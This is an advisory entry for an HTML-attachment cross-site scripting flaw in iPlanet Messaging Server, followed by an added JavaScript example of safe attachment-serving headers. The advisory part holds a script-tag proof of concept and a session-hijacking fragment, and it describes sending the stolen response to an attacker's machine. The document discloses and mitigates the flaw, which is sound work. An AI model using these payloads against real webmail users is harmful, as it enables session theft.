iPlanet Messaging Server HTML Attachment Cross Site Scripting Vulnerability
No exploit is required; however, the following proof of concept HTML code has been provided to demonstrate this issue:

    <html> <script>alert(document.URL)</script> </html>

The following script code has been provided to demonstrate indirect session hijacking using web redirection:

    function%20steal(){var%20xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","<URL_to_spoof>",false);xmlHttp.send();xmlDoc=xmlHttp.responseText;

"xmldoc" can be redirected with an "img src", "window.open", to the attacker machine.
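
The proof of concept only runs if the browser renders the attachment as HTML inside the webmail origin. The following JavaScript is an added example, not code from the advisory or the vendor: it builds download response headers that stop an HTML attachment from being rendered that way. It assumes a webmail application that serves attachments from its own origin; the names INLINE_SAFE_TYPES, safeFilename and attachmentHeaders are hypothetical.

```javascript
// Added example (hypothetical names): headers for serving a mail attachment
// so that an HTML attachment is downloaded, not rendered in the webmail origin.

// Sender-declared types that may keep their real media type.
// text/html and image/svg+xml are deliberately absent: both can carry script.
const INLINE_SAFE_TYPES = new Set([
  "image/png", "image/jpeg", "image/gif", "text/plain",
]);

// Reduce an attacker-controlled filename to something safe inside a quoted
// Content-Disposition parameter.
function safeFilename(name) {
  // Keep only the last path component.
  const base = String(name || "").split(/[\\/]/).pop();
  // Replace control characters (incl. CR/LF, which would split the header)
  // and characters that could end the quoted string or the parameter.
  const cleaned = base.replace(/[\x00-\x1f\x7f"\\;]/g, "_").trim();
  return cleaned.length > 0 ? cleaned.slice(0, 128) : "attachment";
}

function attachmentHeaders(filename, declaredType) {
  // Normalise the declared type: drop parameters, lowercase.
  const type = String(declaredType || "").split(";")[0].trim().toLowerCase();
  return {
    // Anything not explicitly allowed is served as opaque bytes.
    "Content-Type": INLINE_SAFE_TYPES.has(type) ? type : "application/octet-stream",
    // Force a download instead of in-page rendering.
    "Content-Disposition": `attachment; filename="${safeFilename(filename)}"`,
    // Stop the browser from sniffing the body back into text/html.
    "X-Content-Type-Options": "nosniff",
    // If the body is rendered anyway, it gets a unique origin and no script.
    "Content-Security-Policy": "sandbox; default-src 'none'",
  };
}

// Constructed sample attachments, not taken from the advisory.
const samples = [
  ["invoice.html", "text/html; charset=utf-8"],
  ["photo.PNG", "IMAGE/PNG"],
  ["logo.svg", "image/svg+xml"],
];
for (const [name, type] of samples) {
  console.log(name, attachmentHeaders(name, type));
}
```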